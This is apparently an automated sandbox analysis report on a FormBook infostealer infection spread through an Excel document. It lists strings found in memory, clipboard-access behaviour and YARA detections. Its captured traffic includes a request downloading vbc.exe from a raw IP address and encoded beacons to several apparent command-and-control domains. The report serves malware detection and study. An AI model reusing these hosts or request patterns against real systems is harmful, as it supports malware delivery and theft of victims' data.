Source: explorer.exe, 00000006.00000000.481998120.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.491836650.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.549285741.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.481684893.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.477587804.0000000008428000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484199032.00000000083DF000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.489856229.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.549510862.000000000460B000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.471223899.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472862187.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.553074329.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.553133619.00000000083DF000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.481998120.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.477587804.0000000008428000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484199032.00000000083DF000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.549510862.000000000460B000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472862187.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.553133619.00000000083DF000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.491836650.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.553074329.0000000008374000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.470109547.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: wscript.exe, 00000007.00000002.669854680.0000000002E02000.00000004.00020000.sdmp String found in binary or memory: https://credit-b2b.mn.co//ecaq/?z6BXjz6=bfQv/FP2vMWCXJ5
Source: explorer.exe, 00000006.00000000.485841855.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.468574082.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.545212221.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.485841855.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.468574082.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.545212221.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.485841855.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.468574082.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.545212221.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9815DB5.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: www.14d7.com
Source: global traffic HTTP traffic detected: GET /981900000_2/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.167.92.57Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ecaq/?k0Dli=0bA4dpDh3xCt&z6BXjz6=+tTxZdgcqU79mMd7wf6ovAKHVoLw/EhrDF3C/ckFTtMjuwl+tr3xRs8m7m6dFdAioc4v8g== HTTP/1.1Host: www.14d7.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ecaq/?k0Dli=0bA4dpDh3xCt&z6BXjz6=4YbOQk8AO0vy4k2VmRJxI3NcMocUM9+uNZ05HSgMgTndh1RwRX9NSBB2ccr9KRceRZRXnw== HTTP/1.1Host: www.gzz06j.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ecaq/?z6BXjz6=qIaOAylHD+7nuLCKVj0dqMEagOlqUztLhCHwuYmgFKo0pBs1u2Qf4sHa5T8Epw0dehH0mQ==&k0Dli=0bA4dpDh3xCt HTTP/1.1Host: www.flagimir.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ecaq/?k0Dli=0bA4dpDh3xCt&z6BXjz6=Auz5euyZ0mn/RqJ0JcD8xijjXrO6gdmIQxpKfZB0kleOtIEmrjANtIGBIbrQdiyKeV2Adg== HTTP/1.1Host: www.trendyhunterr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_00404E07

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.490000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.490000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.500496726.0000000000390000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668009363.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.667963652.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.492702725.0000000009521000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500520778.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.465010380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500610869.0000000000820000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.465677095.0000000000490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.465359604.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.485058006.0000000009521000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.464491442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668043028.0000000000140000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.490000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.490000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.490000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.490000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.500496726.0000000000390000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.500496726.0000000000390000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.668009363.00000000000D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.668009363.00000000000D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.667963652.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.667963652.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.492702725.0000000009521000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.492702725.0000000009521000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group